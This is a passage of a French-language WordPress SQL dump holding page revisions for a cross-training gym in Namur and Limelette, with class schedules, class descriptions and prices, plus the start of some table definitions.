10:20:52', '2013-11-03 10:20:52', '', 11, 'http://www2.crosstrainingcenter.be/11-revision-v1/', 0, 'revision', '', 0),
(451, 1, '2013-11-04 16:49:45', '2013-11-04 16:49:45', '<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px; width: 50%;\">\r\n<div class=\"sousmenuhoover\">\r\n<div align=\"center\">\r\n\r\nNamur\r\n\r\n</div>\r\n</div></td>\r\n<td style=\"border: 1px; padding: 5px; width: 50%;\">\r\n<div class=\"sousmenu\">\r\n<div align=\"center\">\r\n\r\n<a title=\"Les séances – Limelette\" href=\"http://www2.crosstrainingcenter.be/les-seances-limelette/\">Limelette</a>\r\n\r\n</div>\r\n</div></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h1></h1>\r\n<h1>Team Training - Namur :</h1>\r\nEntrainements en groupe avec un coach qualifié (8 à 12 pers.). Nous vous proposons 4 types de séances décrites ci-dessous\r\n\r\n&nbsp;\r\n<table style=\"width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitreh\">LUNDI</td>\r\n<td class=\"ttitreh\">MARDI</td>\r\n<td class=\"ttitreh\">MERCREDI</td>\r\n<td class=\"ttitreh\">JEUDI</td>\r\n<td class=\"ttitreh\">VENDREDI</td>\r\n<td class=\"ttitreh\">SAMEDI</td>\r\n<td class=\"ttitreh\">DIMANCHE</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"ttrx\"><b>18h</b>\r\nTRX</td>\r\n<td class=\"tcardio\"><b>17h30</b>\r\nCARDIO</td>\r\n<td class=\"trip\"><b>18h</b>\r\nRIP-KETTLE</td>\r\n<td class=\"tglfe\"><b>17h30</b>\r\nGLFE</td>\r\n<td class=\"ttrx\"><b>17h30</b>\r\nTRX</td>\r\n<td class=\"ttrx\"><b>11h</b>\r\nTRX</td>\r\n<td class=\"tglfe\"><b>11h</b>\r\nGLFE</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"tglfe\"><b>18h30</b>\r\nGLFE</td>\r\n<td class=\"ttrx\"><b>18h15</b>\r\nTRX</td>\r\n<td class=\"tcardio\"><b>18h30</b>\r\nCARDIO</td>\r\n<td class=\"trip\"><b>18h15</b>\r\nRIP-KETTLE</td>\r\n<td class=\"tglfe\"><b>18h15</b>\r\nGLFE</td>\r\n<td class=\"tglfe\"><b>11h30</b>\r\nGLFE</td>\r\n<td class=\"ttrx\"><b>11h30</b>\r\nTRX</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"trip\"><b>19h</b>\r\nRIP-KETTLE</td>\r\n<td class=\"tglfe\"><b>19h</b>\r\nGLFE</td>\r\n<td class=\"ttrx\"><b>19h</b>\r\nTRX</td>\r\n<td class=\"tcardio\"><b>19h</b>\r\nCARDIO</td>\r\n<td class=\"trip\"><b>19h</b>\r\nRIP-KETTLE</td>\r\n<td class=\"trip\"><b>12h</b>\r\nRIP-KETTLE</td>\r\n<td class=\"tcardio\"><b>12h</b>\r\nCARDIO</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"tcardio\"><b>19h45</b>\r\nCARDIO</td>\r\n<td class=\"trip\"><b>19h30</b>\r\nRIP-KETTLE</td>\r\n<td class=\"tglfe\"><b>19h45</b>\r\nGLFE</td>\r\n<td class=\"ttrx\"><b>19h15</b>\r\nTRX</td>\r\n<td class=\"tcardio\"><b>19h45</b>\r\nCARDIO</td>\r\n<td class=\"tcellule\"></td>\r\n<td class=\"tcellule\"></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n&nbsp;\r\n\r\n<span style=\"text-decoration: underline; background: #F2F5A9;\"><strong>TRX :</strong></span> entrainement basé sur le poids du corps ! Vous réaliserez des centaines d’exercices qui permettront de développer puissance, force, souplesse, équilibre, mobilité tout en évitant les blessures et avec l\'intensité que vous avez choisie.\r\n\r\n<span style=\"text-decoration: underline; background: #E6E6E6;\"><strong>Circuit GLFE :</strong></span> travaillez de manière fun sur un circuit ultra complet, adapté à votre niveau. Relevez des challenges et augmentez votre confiance en vous ! Ce circuit utilise tous les outils.\r\n\r\n<strong><span style=\"text-decoration: underline; background: #A9F5A9;\">RIP-KETTLE</span> :</strong> alternance d’exercices avec le Kettlebell (cible les zones inaccessibles avec haltères et charges guidées) et le RIP Trainer (outils issus de la kinésithérapie pour travailler la stabilité de la ceinture abdominale, la coordination,…). Excellent cours pour renforcer, tonifier et raffermir en profondeur votre corps.\r\n\r\n<strong><span style=\"text-decoration: underline; background: #A9F5F2;\">CARDIO</span> :</strong> pour développer votre endurance musculaire et cardiovasculaire. Idéal pour brûler un maximum de calories et perdre du poids !\r\n<h1></h1>\r\n<h2>Duo Training - Namur :</h2>\r\n<a title=\"Contact\" href=\"http://www2.crosstrainingcenter.be/contact-2/\" target=\"_blank\">Uniquement sur rdv</a>\r\nEntrainements à deux personnes sous la supervision d’un coach.\r\n<h1></h1>\r\n<h2>Personal Training - Namur :</h2>\r\n<a title=\"Contact\" href=\"http://www2.crosstrainingcenter.be/contact-2/\">Uniquement sur rdv</a>\r\nUn coach par personne, l’idéal pour progresser plus rapidement!\r\n<h1></h1>\r\n<h2>Coaching nutritionnel - Namur :</h2>\r\n<a title=\"Contact\" href=\"http://www2.crosstrainingcenter.be/contact-2/\">Uniquement sur rdv</a>\r\nRendez-vous avec une diététicienne pour améliorer votre santé.\r\n<h1></h1>\r\n<h2>Prix</h2>\r\n<table>\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitrehprix\">Team Training</td>\r\n<td class=\"tcelluleprix\">1 séance : 9.00€\r\n1 carte de 10 séances : 80.00€ (valable 3 mois)\r\n1 carte de 20 séances : 120.00€ (valable 4 mois)\r\nAbonnement 6 mois illimité : 399.00€</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitrehprix\">Package alimentation + sport</td>\r\n<td class=\"tcelluleprix\">1 carte de 20 séances + 1 rdv par semaine de coaching alimentaire pendant 3 mois = 235.00€</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitrehprix\">Coaching nutritionnel</td>\r\n<td class=\"tcelluleprix\">1er rendez-vous : bilan alimentaire et programme personnalisé : 50.00€\r\nSuivi 15,00€</td>\r\n</tr>\r\n</tbody>\r\n</table>', 'Les séances - Namur', '', 'inherit', 'open', 'open', '', '11-revision-v1', '', '', '2013-11-04 16:49:45', '2013-11-04 16:49:45', '', 11, 'http://www2.crosstrainingcenter.be/11-revision-v1/', 0, 'revision', '', 0),
(443, 1, '2013-11-03 10:21:40', '2013-11-03 10:21:40', '<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px; width: 50%;\">\r\n<div class=\"sousmenuhoover\">\r\n<div align=\"center\">\r\n\r\nNamur\r\n\r\n</div>\r\n</div></td>\r\n<td style=\"border: 1px; padding: 5px; width: 50%;\">\r\n<div class=\"sousmenu\">\r\n<div align=\"center\">\r\n\r\n<a title=\"Les séances – Limelette\" href=\"http://www2.crosstrainingcenter.be/les-seances-limelette/\">Limelette</a>\r\n\r\n</div>\r\n</div></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h1>&nbsp;</h1>\r\n<h1>Team Training - Namur :</h1>\r\nEntrainements en groupe avec un coach qualifié (8 à 12 pers.). Nous vous proposons 4 types de séances décrites ci-dessous\r\n\r\n&nbsp;\r\n<table style=\"width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitreh\">LUNDI</td>\r\n<td class=\"ttitreh\">MARDI</td>\r\n<td class=\"ttitreh\">MERCREDI</td>\r\n<td class=\"ttitreh\">JEUDI</td>\r\n<td class=\"ttitreh\">VENDREDI</td>\r\n<td class=\"ttitreh\">SAMEDI</td>\r\n<td class=\"ttitreh\">DIMANCHE</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"ttrx\"><b>18h</b>\r\nTRX</td>\r\n<td class=\"tcardio\"><b>17h30</b>\r\nCARDIO</td>\r\n<td class=\"trip\"><b>18h</b>\r\nRIP-KETTLE</td>\r\n<td class=\"tglfe\"><b>17h30</b>\r\nGLFE</td>\r\n<td class=\"ttrx\"><b>17h30</b>\r\nTRX</td>\r\n<td class=\"ttrx\"><b>11h</b>\r\nTRX</td>\r\n<td class=\"tglfe\"><b>11h</b>\r\nGLFE</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"tglfe\"><b>18h30</b>\r\nGLFE</td>\r\n<td class=\"ttrx\"><b>18h15</b>\r\nTRX</td>\r\n<td class=\"tcardio\"><b>18h30</b>\r\nCARDIO</td>\r\n<td class=\"trip\"><b>18h15</b>\r\nRIP-KETTLE</td>\r\n<td class=\"tglfe\"><b>18h15</b>\r\nGLFE</td>\r\n<td class=\"tglfe\"><b>11h30</b>\r\nGLFE</td>\r\n<td class=\"ttrx\"><b>11h30</b>\r\nTRX</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"trip\"><b>19h</b>\r\nRIP-KETTLE</td>\r\n<td class=\"tglfe\"><b>19h</b>\r\nGLFE</td>\r\n<td class=\"ttrx\"><b>19h</b>\r\nTRX</td>\r\n<td class=\"tcardio\"><b>19h</b>\r\nCARDIO</td>\r\n<td class=\"trip\"><b>19h</b>\r\nRIP-KETTLE</td>\r\n<td class=\"trip\"><b>12h</b>\r\nRIP-KETTLE</td>\r\n<td class=\"tcardio\"><b>12h</b>\r\nCARDIO</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"tcardio\"><b>19h45</b>\r\nCARDIO</td>\r\n<td class=\"trip\"><b>19h30</b>\r\nRIP-KETTLE</td>\r\n<td class=\"tglfe\"><b>19h45</b>\r\nGLFE</td>\r\n<td class=\"ttrx\"><b>19h15</b>\r\nTRX</td>\r\n<td class=\"tcardio\"><b>19h45</b>\r\nCARDIO</td>\r\n<td class=\"tcellule\"></td>\r\n<td class=\"tcellule\"></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n&nbsp;\r\n\r\n<span style=\"text-decoration: underline; background: #F2F5A9;\"><strong>TRX :</strong></span> entrainement basé sur le poids du corps ! Vous réaliserez des centaines d’exercices qui permettront de développer puissance, force, souplesse, équilibre, mobilité tout en évitant les blessures et avec l\'intensité que vous avez choisie.\r\n\r\n<span style=\"text-decoration: underline; background: #E6E6E6;\"><strong>Circuit GLFE :</strong></span> travaillez de manière fun sur un circuit ultra complet, adapté à votre niveau. Relevez des challenges et augmentez votre confiance en vous ! Ce circuit utilise tous les outils.\r\n\r\n<strong><span style=\"text-decoration: underline; background: #A9F5A9;\">RIP-KETTLE</span> :</strong> alternance d’exercices avec le Kettlebell (cible les zones inaccessibles avec haltères et charges guidées) et le RIP Trainer (outils issus de la kinésithérapie pour travailler la stabilité de la ceinture abdominale, la coordination,…). Excellent cours pour renforcer, tonifier et raffermir en profondeur votre corps.\r\n\r\n<strong><span style=\"text-decoration: underline; background: #A9F5F2;\">CARDIO</span> :</strong> pour développer votre endurance musculaire et cardiovasculaire. Idéal pour brûler un maximum de calories et perdre du poids !\r\n<h1>&nbsp;</h1>\r\n<h2>Duo Training - Namur :</h2>\r\n<a title=\"Contact\" href=\"http://www.crosstrainingcenter.be/?page_id=9\">Uniquement sur rdv</a>\r\nEntrainements à deux personnes sous la supervision d’un coach.\r\n<h1>&nbsp;</h1>\r\n<h2>Personal Training - Namur :</h2>\r\n<a title=\"Contact\" href=\"http://www.crosstrainingcenter.be/?page_id=9\">Uniquement sur rdv</a>\r\nUn coach par personne, l’idéal pour progresser plus rapidement!\r\n<h1>&nbsp;</h1>\r\n<h2>Coaching nutritionnel - Namur :</h2>\r\n<a title=\"Contact\" href=\"http://www.crosstrainingcenter.be/?page_id=9\">Uniquement sur rdv</a>\r\nRendez-vous avec une diététicienne pour améliorer votre santé.\r\n<h1>&nbsp;</h1>\r\n<h2>Prix</h2>\r\n<table>\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitrehprix\">Team Training</td>\r\n<td class=\"tcelluleprix\">1 séance : 9.00€\r\n1 carte de 10 séances : 80.00€ (valable 3 mois)\r\n1 carte de 20 séances : 120.00€ (valable 4 mois)\r\nAbonnement 6 mois illimité : 399.00€</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitrehprix\">Package alimentation + sport</td>\r\n<td class=\"tcelluleprix\">1 carte de 20 séances + 1 rdv par semaine de coaching alimentaire pendant 3 mois = 235.00€</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitrehprix\">Coaching nutritionnel</td>\r\n<td class=\"tcelluleprix\">1er rendez-vous : bilan alimentaire et programme personnalisé : 50.00€\r\nSuivi 15,00€</td>\r\n</tr>\r\n</tbody>\r\n</table>', 'Les séances - Namur', '', 'inherit', 'open', 'open', '', '11-revision-v1', '', '', '2013-11-03 10:21:40', '2013-11-03 10:21:40', '', 11, 'http://www2.crosstrainingcenter.be/11-revision-v1/', 0, 'revision', '', 0),
(444, 1, '2013-11-03 10:23:00', '2013-11-03 10:23:00', '<h1>Retrouvez ici les vidéos illustrant le déroulements des séances</h1>\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px; width: 50%;\">\r\n<div class=\"arrondi\">\r\n\r\n<div align=\"center\">\r\n\r\nPrésentation du Cross Training Namur\r\n\r\n<iframe src=\"//www.youtube.com/embed/z_jNG_jQ8gU\" height=\"225\" width=\"300\" allowfullscreen=\"\" frameborder=\"0\"></iframe>\r\n\r\n</div>\r\n\r\n</div></td>\r\n<td style=\"border: 1px; padding: 5px; width: 50%;\">\r\n<div class=\"arrondi\">\r\n\r\n<div align=\"center\">\r\n\r\nOuverture du Cross Training Limelette\r\n\r\n<iframe src=\"//www.youtube.com/embed/6tWEAsQ_ePQ\" height=\"225\" width=\"300\" allowfullscreen=\"\" frameborder=\"0\"></iframe>\r\n\r\n</div>\r\n\r\n</div></td>\r\n</tr>\r\n</table>', 'En image', '', 'inherit', 'open', 'open', '', '360-revision-v1', '', '', '2013-11-03 10:23:00', '2013-11-03 10:23:00', '', 360, 'http://www2.crosstrainingcenter.be/360-revision-v1/', 0, 'revision', '', 0),
(447, 1, '2013-11-03 10:41:35', '2013-11-03 10:41:35', '<table style=\"border: 1px; width: 100%;\">\n<tbody>\n<tr style=\"background-color: #ffffff;\">\n<td style=\"border: 1px; padding: 5px; width: 50%;\">\n<div class=\"sousmenu\">\n<div align=\"center\">\n\n<a title=\"Les séances – Namur\" href=\"http://www2.crosstrainingcenter.be/les-seances/\">Namur</a>\n\n</div>\n</div></td>\n<td style=\"border: 1px; padding: 5px; width: 50%;\">\n<div class=\"sousmenu\">\n<div align=\"center\">\n\n<a title=\"Les séances – Limelette\" href=\"http://www2.crosstrainingcenter.be/les-seances-limelette/\">Limelette</a>\n\n</div>\n</div></td>\n</tr>\n</tbody>\n</table>\n<h1>&nbsp;</h1>\n<h1>&nbsp;</h1>\n<h1 style=\"text-align: center;\">Choix d\'une salle</h1>\n<img class=\"size-full wp-image-446 aligncenter\" alt=\"map\" src=\"http://www2.crosstrainingcenter.be/wp-content/uploads/2013/11/map.png\" width=\"300\" height=\"236\" usemap=\"#imagemap\" />\n\n                        <map name=\"imagemap\" id=\"Map\"> \n                        <area shape=\"namur\" coords=\"90,84,166,108\" href=\"http://www2.crosstrainingcenter.be/les-seances-limelette/\" /> \n                        <area shape=\"limelette\" coords=\"174,121,233,132\" href=\"http://www2.crosstrainingcenter.be/les-seances/\" /> \n                        </map> \n', 'Les séances', '', 'inherit', 'open', 'open', '', '385-autosave-v1', '', '', '2013-11-03 10:41:35', '2013-11-03 10:41:35', '', 385, 'http://www2.crosstrainingcenter.be/385-autosave-v1/', 0, 'revision', '', 0),
(448, 1, '2013-11-03 10:40:32', '2013-11-03 10:40:32', '<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px; width: 50%;\">\r\n<div class=\"sousmenu\">\r\n<div align=\"center\">\r\n\r\n<a title=\"Les séances – Namur\" href=\"http://www2.crosstrainingcenter.be/les-seances/\">Namur</a>\r\n\r\n</div>\r\n</div></td>\r\n<td style=\"border: 1px; padding: 5px; width: 50%;\">\r\n<div class=\"sousmenu\">\r\n<div align=\"center\">\r\n\r\n<a title=\"Les séances – Limelette\" href=\"http://www2.crosstrainingcenter.be/les-seances-limelette/\">Limelette</a>\r\n\r\n</div>\r\n</div></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h1></h1>\r\n<h1></h1>\r\n<h1 style=\"text-align: center;\">Choix d\'une salle</h1>\r\n<img class=\"size-full wp-image-446 aligncenter\" alt=\"map\" src=\"http://www2.crosstrainingcenter.be/wp-content/uploads/2013/11/map.png\" width=\"300\" height=\"236\" usemap=\"#imagemap\" />\r\n\r\n                        <map name=\"imagemap\" id=\"Map\"> \r\n                        <area shape=\"namur\" coords=\"90,84,166,108\" href=\"http://www2.crosstrainingcenter.be/les-seances-limelette/\" /> \r\n                        <area shape=\"limelette\" coords=\"174,121,233,132\" href=\"http://www2.crosstrainingcenter.be/les-seances/\" /> \r\n                        </map> \r\n', 'Les séances', '', 'inherit', 'open', 'open', '', '385-revision-v1', '', '', '2013-11-03 10:40:32', '2013-11-03 10:40:32', '', 385, 'http://www2.crosstrainingcenter.be/385-revision-v1/', 0, 'revision', '', 0),
(449, 1, '2013-11-03 10:41:37', '2013-11-03 10:41:37', '<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px; width: 50%;\">\r\n<div class=\"sousmenu\">\r\n<div align=\"center\">\r\n\r\n<a title=\"Les séances – Namur\" href=\"http://www2.crosstrainingcenter.be/les-seances/\">Namur</a>\r\n\r\n</div>\r\n</div></td>\r\n<td style=\"border: 1px; padding: 5px; width: 50%;\">\r\n<div class=\"sousmenu\">\r\n<div align=\"center\">\r\n\r\n<a title=\"Les séances – Limelette\" href=\"http://www2.crosstrainingcenter.be/les-seances-limelette/\">Limelette</a>\r\n\r\n</div>\r\n</div></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h1>&nbsp;</h1>\r\n<h1>&nbsp;</h1>\r\n<h1 style=\"text-align: center;\">Choix d\'une salle</h1>\r\n<img class=\"size-full wp-image-446 aligncenter\" alt=\"map\" src=\"http://www2.crosstrainingcenter.be/wp-content/uploads/2013/11/map.png\" width=\"300\" height=\"236\" usemap=\"#imagemap\" />\r\n\r\n                        <map name=\"imagemap\" id=\"Map\"> \r\n                        <area shape=\"namur\" coords=\"90,84,166,108\" href=\"http://www2.crosstrainingcenter.be/les-seances-limelette/\" /> \r\n                        <area shape=\"limelette\" coords=\"174,121,233,132\" href=\"http://www2.crosstrainingcenter.be/les-seances/\" /> \r\n                        </map> \r\n', 'Les séances', '', 'inherit', 'open', 'open', '', '385-revision-v1', '', '', '2013-11-03 10:41:37', '2013-11-03 10:41:37', '', 385, 'http://www2.crosstrainingcenter.be/385-revision-v1/', 0, 'revision', '', 0),
(452, 1, '2013-11-04 17:06:55', '2013-11-04 17:06:55', '<table style=\"border: 1px; width: 100%;\">\n<tbody>\n<tr style=\"background-color: #ffffff;\">\n<td style=\"border: 1px; padding: 5px; width: 50%;\">\n<div class=\"sousmenu\">\n<div align=\"center\">\n\n<a title=\"Les séances – Namur\" href=\"http://www2.crosstrainingcenter.be/les-seances/\">Namur</a>\n\n</div>\n</div></td>\n<td style=\"border: 1px; padding: 5px; width: 50%;\">\n<div class=\"sousmenuhoover\">\n<div align=\"center\">\n\nLimelette\n\n</div>\n</div></td>\n</tr>\n</tbody>\n</table>\n<h1></h1>\n<h1>Team Training - Limelette :</h1>\nEntrainements en groupe avec un coach qualifié (8 à 12 pers.). Nous vous proposons 4 types de séances décrites ci-dessous\n\n&nbsp;\n<table style=\"width: 100%;\">\n<tbody>\n<tr>\n<td class=\"ttitreh\">LUNDI</td>\n<td class=\"ttitreh\">MARDI</td>\n<td class=\"ttitreh\">MERCREDI</td>\n<td class=\"ttitreh\">JEUDI</td>\n</tr>\n<tr style=\"background-color: #fafafa;\">\n<td class=\"ttrx\"><b>18h</b>\nRenforcement musculaire</td>\n<td class=\"tcardio\"><b></b>18h\nCardio</td>\n<td class=\"trip\"><b>18h</b>\nCircuit training</td>\n<td class=\"tglfe\"><b>17h30</b>\nRenforcement musculaire</td>\n</tr>\n<tr style=\"background-color: #eeeeee;\">\n<td class=\"tglfe\"><b>18h45</b>\nCircuit training</td>\n<td class=\"ttrx\"><b>18h45</b>\nRenforcement musculaire</td>\n<td class=\"tcardio\"><b>18h45</b>\nCardio</td>\n<td class=\"trip\"><b>18h15</b>\nCircuit training</td>\n</tr>\n<tr style=\"background-color: #fafafa;\">\n<td class=\"tcardio\"><b>19h30</b>\nCardio</td>\n<td class=\"tglfe\"><b>19h30</b>\nCircuit training</td>\n<td class=\"ttrx\"><b>19h30</b>\nRenforcement musculaire</td>\n<td class=\"tcardio\"><b>19h</b>\nCardio</td>\n</tr>\n</tbody>\n</table>\n&nbsp;\n\n<span style=\"text-decoration: underline; background: #F2F5A9;\"><strong>TRX :</strong></span> entrainement basé sur le poids du corps ! Vous réaliserez des centaines d’exercices qui permettront de développer puissance, force, souplesse, équilibre, mobilité tout en évitant les blessures et avec l\'intensité que vous avez choisie.\n\n<span style=\"text-decoration: underline; background: #E6E6E6;\"><strong>Circuit GLFE :</strong></span> travaillez de manière fun sur un circuit ultra complet, adapté à votre niveau. Relevez des challenges et augmentez votre confiance en vous ! Ce circuit utilise tous les outils.\n\n<strong><span style=\"text-decoration: underline; background: #A9F5A9;\">RIP-KETTLE</span> :</strong> alternance d’exercices avec le Kettlebell (cible les zones inaccessibles avec haltères et charges guidées) et le RIP Trainer (outils issus de la kinésithérapie pour travailler la stabilité de la ceinture abdominale, la coordination,…). Excellent cours pour renforcer, tonifier et raffermir en profondeur votre corps.\n\n<strong><span style=\"text-decoration: underline; background: #A9F5F2;\">CARDIO</span> :</strong> pour développer votre endurance musculaire et cardiovasculaire. Idéal pour brûler un maximum de calories et perdre du poids !\n<h1></h1>\n<h2>Duo Training - Limelette :</h2>\n<a title=\"Contact\" href=\"http://www.crosstrainingcenter.be/?page_id=9\">Uniquement sur rdv</a>\nEntrainements à deux personnes sous la supervision d’un coach.\n<h1></h1>\n<h2>Personal Training - Limelette :</h2>\n<a title=\"Contact\" href=\"http://www.crosstrainingcenter.be/?page_id=9\">Uniquement sur rdv</a>\nUn coach par personne, l’idéal pour progresser plus rapidement!\n<h1></h1>\n<h2>Coaching nutritionnel - Limelette :</h2>\n<a title=\"Contact\" href=\"http://www.crosstrainingcenter.be/?page_id=9\">Uniquement sur rdv</a>\nRendez-vous avec une diététicienne pour améliorer votre santé.\n<h1></h1>\n<h2>Prix</h2>\n<table>\n<tbody>\n<tr>\n<td class=\"ttitrehprix\">Team Training</td>\n<td class=\"tcelluleprix\">1 séance : 9.00€\n1 carte de 10 séances : 80.00€ (valable 3 mois)\n1 carte de 20 séances : 120.00€ (valable 4 mois)\nAbonnement 6 mois illimité : 399.00€</td>\n</tr>\n<tr>\n<td class=\"ttitrehprix\">Package alimentation + sport</td>\n<td class=\"tcelluleprix\">1 carte de 20 séances + 1 rdv par semaine de coaching alimentaire pendant 3 mois = 235.00€</td>\n</tr>\n<tr>\n<td class=\"ttitrehprix\">Coaching nutritionnel</td>\n<td class=\"tcelluleprix\">1er rendez-vous : bilan alimentaire et programme personnalisé : 50.00€\nSuivi 15,00€</td>\n</tr>\n</tbody>\n</table>', 'Les séances - Limelette', '', 'inherit', 'open', 'open', '', '383-autosave-v1', '', '', '2013-11-04 17:06:55', '2013-11-04 17:06:55', '', 383, 'http://www2.crosstrainingcenter.be/383-autosave-v1/', 0, 'revision', '', 0),
(454, 1, '2013-11-04 17:07:15', '2013-11-04 17:07:15', '<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px; width: 50%;\">\r\n<div class=\"sousmenu\">\r\n<div align=\"center\">\r\n\r\n<a title=\"Les séances – Namur\" href=\"http://www2.crosstrainingcenter.be/les-seances/\">Namur</a>\r\n\r\n</div>\r\n</div></td>\r\n<td style=\"border: 1px; padding: 5px; width: 50%;\">\r\n<div class=\"sousmenuhoover\">\r\n<div align=\"center\">\r\n\r\nLimelette\r\n\r\n</div>\r\n</div></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h1></h1>\r\n<h1>Team Training - Limelette :</h1>\r\nEntrainements en groupe avec un coach qualifié (8 à 12 pers.). Nous vous proposons 4 types de séances décrites ci-dessous\r\n\r\n&nbsp;\r\n<table style=\"width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitreh\">LUNDI</td>\r\n<td class=\"ttitreh\">MARDI</td>\r\n<td class=\"ttitreh\">MERCREDI</td>\r\n<td class=\"ttitreh\">JEUDI</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"ttrx\"><b>18h</b>\r\nRenforcement musculaire</td>\r\n<td class=\"tcardio\"><b></b>18h\r\nCardio</td>\r\n<td class=\"trip\"><b>18h</b>\r\nCircuit training</td>\r\n<td class=\"ttrx\"><b>17h30</b>\r\nRenforcement musculaire</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"tglfe\"><b>18h45</b>\r\nCircuit training</td>\r\n<td class=\"ttrx\"><b>18h45</b>\r\nRenforcement musculaire</td>\r\n<td class=\"tcardio\"><b>18h45</b>\r\nCardio</td>\r\n<td class=\"trip\"><b>18h15</b>\r\nCircuit training</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"tcardio\"><b>19h30</b>\r\nCardio</td>\r\n<td class=\"tglfe\"><b>19h30</b>\r\nCircuit training</td>\r\n<td class=\"ttrx\"><b>19h30</b>\r\nRenforcement musculaire</td>\r\n<td class=\"tcardio\"><b>19h</b>\r\nCardio</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n&nbsp;\r\n\r\n<span style=\"text-decoration: underline; background: #F2F5A9;\"><strong>TRX :</strong></span> entrainement basé sur le poids du corps ! Vous réaliserez des centaines d’exercices qui permettront de développer puissance, force, souplesse, équilibre, mobilité tout en évitant les blessures et avec l\'intensité que vous avez choisie.\r\n\r\n<span style=\"text-decoration: underline; background: #E6E6E6;\"><strong>Circuit GLFE :</strong></span> travaillez de manière fun sur un circuit ultra complet, adapté à votre niveau. Relevez des challenges et augmentez votre confiance en vous ! Ce circuit utilise tous les outils.\r\n\r\n<strong><span style=\"text-decoration: underline; background: #A9F5A9;\">RIP-KETTLE</span> :</strong> alternance d’exercices avec le Kettlebell (cible les zones inaccessibles avec haltères et charges guidées) et le RIP Trainer (outils issus de la kinésithérapie pour travailler la stabilité de la ceinture abdominale, la coordination,…). Excellent cours pour renforcer, tonifier et raffermir en profondeur votre corps.\r\n\r\n<strong><span style=\"text-decoration: underline; background: #A9F5F2;\">CARDIO</span> :</strong> pour développer votre endurance musculaire et cardiovasculaire. Idéal pour brûler un maximum de calories et perdre du poids !\r\n<h1></h1>\r\n<h2>Duo Training - Limelette :</h2>\r\n<a title=\"Contact\" href=\"http://www.crosstrainingcenter.be/?page_id=9\">Uniquement sur rdv</a>\r\nEntrainements à deux personnes sous la supervision d’un coach.\r\n<h1></h1>\r\n<h2>Personal Training - Limelette :</h2>\r\n<a title=\"Contact\" href=\"http://www.crosstrainingcenter.be/?page_id=9\">Uniquement sur rdv</a>\r\nUn coach par personne, l’idéal pour progresser plus rapidement!\r\n<h1></h1>\r\n<h2>Coaching nutritionnel - Limelette :</h2>\r\n<a title=\"Contact\" href=\"http://www.crosstrainingcenter.be/?page_id=9\">Uniquement sur rdv</a>\r\nRendez-vous avec une diététicienne pour améliorer votre santé.\r\n<h1></h1>\r\n<h2>Prix</h2>\r\n<table>\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitrehprix\">Team Training</td>\r\n<td class=\"tcelluleprix\">1 séance : 9.00€\r\n1 carte de 10 séances : 80.00€ (valable 3 mois)\r\n1 carte de 20 séances : 120.00€ (valable 4 mois)\r\nAbonnement 6 mois illimité : 399.00€</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitrehprix\">Package alimentation + sport</td>\r\n<td class=\"tcelluleprix\">1 carte de 20 séances + 1 rdv par semaine de coaching alimentaire pendant 3 mois = 235.00€</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitrehprix\">Coaching nutritionnel</td>\r\n<td class=\"tcelluleprix\">1er rendez-vous : bilan alimentaire et programme personnalisé : 50.00€\r\nSuivi 15,00€</td>\r\n</tr>\r\n</tbody>\r\n</table>', 'Les séances - Limelette', '', 'inherit', 'open', 'open', '', '383-revision-v1', '', '', '2013-11-04 17:07:15', '2013-11-04 17:07:15', '', 383, 'http://www2.crosstrainingcenter.be/383-revision-v1/', 0, 'revision', '', 0);

-- --------------------------------------------------------

--
-- Structure de la table `www_post_relationships`
--

CREATE TABLE `www_post_relationships` (
  `relate_id` bigint(20) UNSIGNED NOT NULL,
  `post_id` bigint(20) UNSIGNED NOT NULL,
  `has_post_id` bigint(20) UNSIGNED NOT NULL
) ENGINE=MyISAM DEFAULT CHARSET=utf8;

-- --------------------------------------------------------

--
-- Structure de la table `www_slideshow_plugin`
--

CREATE TABLE `www_slideshow_plugin` (
